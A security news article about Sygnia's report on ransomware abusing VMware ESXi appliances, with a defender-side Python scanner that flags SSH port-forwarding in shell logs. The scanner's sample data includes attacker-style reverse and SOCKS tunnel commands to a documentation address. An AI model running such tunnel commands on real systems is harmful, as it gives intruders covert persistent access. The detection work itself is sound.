
Sygnia’s latest report reveals the evolving tactics of ransomware groups targeting VMware ESXi appliances. By exploiting these critical virtualized infrastructure components, attackers aim to disrupt operations and maintain stealthy persistence within compromised networks.
ESXi appliances have become prime targets due to their role in hosting vital virtual machines. “Damaging them renders virtual machines inaccessible, severely disrupting the business operations of affected organizations,” notes Sygnia. Beyond encrypting and exfiltrating files, ransomware operators leverage ESXi devices as pivot points to tunnel malicious traffic within networks, often undetected due to limited monitoring.
One of the techniques detailed in the report involves SSH tunneling. Attackers establish a semi-persistent backdoor by exploiting administrative credentials or vulnerabilities to access ESXi devices. Using the native SSH functionality, threat actors create a remote port-forwarding SOCKS tunnel, enabling them to blend malicious traffic with legitimate activity.
Sygnia explains, “Since ESXi appliances are resilient and rarely shut down unexpectedly, this tunneling serves as a semi-persistent backdoor within the network.” This approach allows attackers to bypass perimeter defenses and maintain access for extended periods.

ESXi’s logging structure complicates forensic investigations. Unlike traditional syslogs, ESXi organizes logs by activity, spreading critical events across multiple files, such as /var/log/shell.log, /var/log/auth.log, and /var/log/hostd.log. Sygnia emphasizes, “Configuring syslog forwarding from the ESXi server to an external syslog server can solve the issue.”
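As an added defender-side example (not code from Sygnia's report or from this article), the scanner below reads ESXi shell-history entries and flags any ssh invocation that requests remote (-R), dynamic SOCKS (-D) or local (-L) port forwarding, the pattern the tunneling technique above leaves behind. The "<ts> shell[<pid>]: [<user>]: <command>" line shape is an assumption about /var/log/shell.log, and the sample entries are constructed.

```python
import re

# Assumed shape of an ESXi /var/log/shell.log entry: "<ts> shell[<pid>]: [<user>]: <command>".
SHELL_RE = re.compile(
    r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.+)$"
)
# ssh single-letter options that consume an argument, so "-p 2222" is not mis-read as a flag cluster.
ARG_OPTS = set("bcDEeFIiJLlmOopQRSWw")
FORWARD_FLAGS = {"R": "remote-forward", "D": "dynamic-socks", "L": "local-forward"}
FORWARD_KEYS = {"RemoteForward": "remote-forward", "DynamicForward": "dynamic-socks",
                "LocalForward": "local-forward"}


def forwarding_kinds(cmd):
    """Return the port-forwarding kinds an ssh command line requests (empty set if none)."""
    argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return set()
    kinds = set()
    for tok in argv[1:]:
        if tok.startswith("-") and len(tok) > 1 and not tok.startswith("--"):
            for ch in tok[1:]:          # walk a flag cluster such as -fNR
                if ch in FORWARD_FLAGS:
                    kinds.add(FORWARD_FLAGS[ch])
                if ch in ARG_OPTS:      # the rest of the cluster is that option's value
                    break
        elif tok.split("=", 1)[0] in FORWARD_KEYS:   # "-o RemoteForward=..." form
            kinds.add(FORWARD_KEYS[tok.split("=", 1)[0]])
    return kinds


def scan_shell_log(text):
    """Return (timestamp, user, kinds, command) for every entry that sets up an ssh tunnel."""
    findings = []
    for line in text.splitlines():
        m = SHELL_RE.match(line)
        if m:
            kinds = forwarding_kinds(m["cmd"])
            if kinds:
                findings.append((m["ts"], m["user"], sorted(kinds), m["cmd"]))
    return findings


# Constructed sample entries (not real ESXi output); 203.0.113.10 is a documentation address.
SAMPLE_SHELL_LOG = """\
2024-03-01T02:14:07Z shell[2098765]: [root]: esxcli network firewall ruleset list
2024-03-01T02:14:31Z shell[2098765]: [root]: ssh -fN -R 9000:127.0.0.1:22 relay@203.0.113.10
2024-03-01T02:15:02Z shell[2098765]: [root]: ssh -D 1080 -N relay@203.0.113.10
2024-03-01T02:16:44Z shell[2098766]: [root]: vim-cmd vmsvc/getallvms
"""
```

Run the same logic on the syslog-forwarded copy of shell.log rather than on the appliance itself, so a finding survives even if the attacker clears local logs.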
The report highlights Abyss Locker ransomware as an example of how ESXi appliances are exploited. Attackers used ESXi devices and Network Attached Storage (NAS) as network pivot points, underscoring the critical need for robust monitoring and defense strategies.